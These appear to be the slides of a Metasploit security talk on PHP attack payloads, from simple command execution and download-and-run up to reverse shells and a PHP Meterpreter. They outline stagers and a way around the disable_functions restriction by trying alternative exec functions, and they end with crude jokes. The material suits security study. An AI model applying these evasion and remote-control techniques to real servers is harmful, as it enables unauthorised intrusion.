Beyond r57

egypt@metasploit.com

Outline

PHP Background

• It’s terrible

• It’s always been terrible

• Objects are an afterthought

• Function names aren’t consistent

Why bother?

• They have to be uploaded and configured

– Leaves logs, files on disk

• Some call home to the authors

• They all focus on the server

– Maybe the database, too

• Nothing looks beyond, to the network

Rome Wasn’t Sacked in a Day

• Build payloads from simple -> complex

Essence of Payloads

• Create form of communication

• Do your bidding

Simplest: Exec

• Just run a system command

• Don’t care about input/output

• php/exec

Slightly Less Simple: download-exec

• Go grab an executable from a listening webserver

• Save it to disk and run it

• Still don’t care about input/output

• php/download_exec

More Complex: shell

• Need to have a comm channel

• Listen for input and send back output

• php/reverse_tcp

• php/bind_tcp

Meterpreter

• Flexible, extensible, capable

• php/meterpreter/reverse_tcp

• php/meterpreter/bind_tcp

Meterpreter for Pwned Home Pages

• Doesn’t have to be on disk

• Uses the same protocol and extension system

– The existing client works just fine

• Does as much as possible w/o using a shell

– Works in a chroot, doesn’t require /bin/sh

• Platform independent; works anywhere PHP works

Meterpreter Required Reading

• “Beyond EIP” 2006

– skape and spoonm, Blackhat Federal

• “Hacking Macs for Fun and Profit” 2009

– Dino dai Zovi and Charlie Miller, CanSecWest

Why is Meterpreter cool?

• Works even in restrictive environments

• Not limited to installed commands

• If it has more access, it can do cooler stuff

• Programmatically automatable

Meterpreter screenie

Meterpreter

• Flexible extension system

• Uses a (mostly) binary protocol

– TLV (Type, Length, Value)

– Designed for extensibility

Meterpreter Protocol

Length Type Value …..

4 bytes 4 bytes ($length - 8) bytes

Length Type Value …..

Meterpreter Protocol

• Packets are themselves TLVs

• TLVs make parsing simple and flexible

– No formatting knowledge is required outside of the TLV structure

– Allows a core packet parsing engine without any knowledge of extensions or their protocols

Meterpreter Ruby API

• Powerful and flexible scripting capabilities

• Extensions create an attribute under the main client object

• Various bits of info in each extension

– client.sys.config.sysinfo

– client.net.socket.create_tcp_client_channel

Challenges of doing all this in PHP

Liabilities

• Magic Quotes

• Size restrictions

• Safe mode

• disable_functions setting in php.ini

• PHP Quirks

We Don’t Need No Stinking Quotes

Size Restrictions

• URL length is limited to 4000 bytes on Apache

• Total length of an HTTP header value is 8190

• Solution is the same as for other kinds of shellcode: stagers

– Setup some kind of communication with the attacker, read in more code, eval

Safe Mode

• Kind of a bummer for some things

• Restricts files and command exec

• Doesn’t limit sockets in any way

disable_functions setting

• Sucks

• Can try a bunch of different functions with similar purposes until one works

– shell_exec -> passthru -> system -> popen …

• Esser’s memory corruption fu

PHP Quirks

• Stream vs Socket Resources

– stream_select() vs socket_select()

• Operator precedence

– $var & CONST == CONST

– $var & (CONST == CONST)

– $var & 1

• Can’t assume to have > version 4.3

Assets

• Many ways of doing the same thing

– System Commands, Sockets

• Your brains, his strength, my steel.

Running System Commands

• system, exec, popen, pctl_open, shell_exec, passthru, proc_open

• A few non-default extensions: perl, win32std, win32services, almost certainly others

Communications

• Use the webserver

– Simple, effective. Most existing payloads do this

– Leaves logs =(

• Programs on the system: nc, bash, ftp, …

– No guarantee they’ll be there or work

• Sockets

Sockets

• fsockopen, pfsockopen, socket_create, stream_socket, fopen

• Extensions: curl, perl (wtf?)

Files

• fopen is usually enough

– Nobody disables it because it would break everything

Future

• Javaterpreter, JSPterpreter

– Already in the works, written by mihi

• ASPterpreter?

• Macterpreter/POSIX Meterpreter

– Most of the code is there but is not really usable

What should I call it?

• PHP Meterpreter, php-terpreter

• meterphpreter (pronounced “meterfpreter”)

• phpterpreter (pronounced “fapterpreter”)

• phpsucksmyballsterpreter

Demos

Questions

8=====D